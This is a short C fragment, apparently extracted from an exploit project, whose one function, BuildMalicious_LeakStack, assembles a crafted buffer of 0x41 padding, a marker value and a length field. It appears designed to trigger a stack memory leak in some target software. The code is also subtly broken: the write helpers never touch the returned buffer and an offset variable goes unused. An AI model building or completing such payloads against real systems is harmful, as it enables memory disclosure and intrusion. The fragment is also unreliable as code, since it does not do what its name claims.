
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int UINT ;
typedef int BYTE ;


 int WriteDword (int) ;
 int WriteWord (int) ;

BYTE *BuildMalicious_LeakStack()
{
 static BYTE buf[0x4020] = {0};
 UINT offs = 0;

 WriteWord(0x52);

 for(UINT i=0; i<0x2000; i++)
  WriteWord(0x41);

 WriteWord(0);

 WriteDword(0);
 WriteDword(0x4078);

 WriteDword(0x41414141);
 WriteDword(0x41414141);
 WriteDword(0x41414141);
 WriteDword(0x41414141);
 WriteDword(0x41414141);

 return buf;
}
